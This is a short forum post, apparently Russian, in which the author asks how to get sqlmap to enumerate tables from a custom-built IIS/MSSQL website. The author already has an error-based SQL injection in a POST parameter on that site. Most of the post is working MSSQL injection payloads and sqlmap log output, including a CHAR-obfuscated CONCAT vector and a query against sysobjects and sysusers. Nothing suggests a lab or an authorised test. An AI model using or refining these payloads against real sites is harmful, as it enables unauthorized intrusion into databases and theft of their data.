IIS/dbms:mssql

boolean-based blind/error-based

1. при technique=B --is-dba=true при technique=E --is-dba=false. почему?

2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц.

как заставить скульмап вывести таблицы ?

Parameter: #1* ((custom) POST)

Type: error-based

Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)

Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(1 13)) AND (8607=8607

Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')

---

[INFO] fetching tables for database: db1

[PAYLOAD] -1789

[PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects. name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98) +CHAR(118)+CHAR(113)) AND (2349=2349

[WARNING] the SQL query provided does not return any output